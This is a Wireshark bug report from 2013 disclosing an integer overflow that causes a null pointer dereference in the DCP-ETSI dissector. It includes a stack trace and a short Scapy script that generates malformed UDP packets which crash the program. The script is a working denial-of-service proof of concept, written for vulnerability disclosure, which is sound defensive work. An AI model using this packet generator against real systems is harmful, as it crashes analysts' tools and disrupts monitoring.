Wireshark-bugs: [Wireshark-bugs] [Bug 8540] New: Integer Overflow -> Null Pointer Dereference pa
Date: Fri, 29 Mar 2013 18:30:25 +0000
Bug ID 8540
Summary Integer Overflow -> Null Pointer Dereference packet-dcp-etsi.c
Classification Unclassified
Product Wireshark
Version 1.8.6
Hardware x86
OS Linux (other)
Status UNCONFIRMED
Severity Major
Priority Low
Component Dissection engine (libwireshark)
Assignee bugzilla-admin@wireshark.org
Reporter evan.p.jensen@gmail.com

Created attachment 10504 [details]
pcap that will crash wireshark

Build Information:

--
Misuse of integers in packet-dci-etsi.c allows for an argument of 0 to be
passed to g_malloc which will return a null pointer. The program will crash
when trying to use that memory.


decoded_size is calculated on line 274 and can overflow
decoded_size is passed to g_malloc on line 350, g_malloc returns a null ptr
That null ptr is used in rs_deinterleave to poor effect. 

Stacktrace:

#0  0x00007ffff4d90feb in rs_deinterleave (input=0x1f51f10 "", output=0x0,
plen=256, fcount=256) at packet-dcp-etsi.c:218
#1  0x00007ffff4d91605 in dissect_pft_fec_detailed (tvb=0x1f1a5e0,
pinfo=0x7fffffffd960, tree=0x0, findex=255, fcount=256, 
    seq=9156, offset=20, plen=256, fec=1, rsk=255, rsz=71, fdx=0x1ee1750) at
packet-dcp-etsi.c:351
#2  0x00007ffff4d91824 in dissect_pft_fragmented (tvb=0x1f1a5e0,
pinfo=0x7fffffffd960, tree=0x0, findex=255, fcount=256, seq=9156, 
    offset=20, plen=256, fec=1, rsk=255, rsz=71) at packet-dcp-etsi.c:411
#3  0x00007ffff4d91e61 in dissect_pft (tvb=0x1f1a5e0, pinfo=0x7fffffffd960,
tree=0x0) at packet-dcp-etsi.c:525
#4  0x00007ffff4b0d92a in call_dissector_through_handle (handle=0x1851510,
tvb=0x1f1a5e0, pinfo=0x7fffffffd960, tree=0x0)
    at packet.c:433
#5  0x00007ffff4b0daf7 in call_dissector_work (handle=0x1851510, tvb=0x1f1a5e0,
pinfo_arg=0x7fffffffd960, tree=0x0, 
    add_proto_name=1) at packet.c:524
#6  0x00007ffff4b0e8f9 in dissector_try_string (sub_dissectors=0xbd12a0,
string=0x7fffe1ae40a8 "PF", tvb=0x1f1a5e0, 
    pinfo=0x7fffffffd960, tree=0x0) at packet.c:1202
#7  0x00007ffff4d90f95 in dissect_dcp_etsi (tvb=0x1f1a5e0,
pinfo=0x7fffffffd960, tree=0x0) at packet-dcp-etsi.c:200
#8  0x00007ffff4b0f5cd in dissector_try_heuristic (sub_dissectors=0x9766b0,
tvb=0x1f1a5e0, pinfo=0x7fffffffd960, tree=0x0)
    at packet.c:1733
#9  0x00007ffff53609b6 in decode_udp_ports (tvb=0x1f1a640, offset=8,
pinfo=0x7fffffffd960, tree=0x0, uh_sport=42404, 
    uh_dport=55935, uh_ulen=284) at packet-udp.c:281


Script to generate packets:
from scapy.all import *
from struct import pack
packets=[]
top=IP(dst='127.0.0.1')/UDP(dport=55935,sport=42404)

for i in range(1,0x100):
    packets.append(top/(pack(">HHBHBBBHBBH",0x5046,0x23c4, 0x00,i,
0x00,0x01,0x00,  0xffff, 0xff,0x47, 0x4547)+'A'*0x104))


wrpcap('lol.pcap',packets)


You are receiving this mail because:
  • You are watching all bug changes.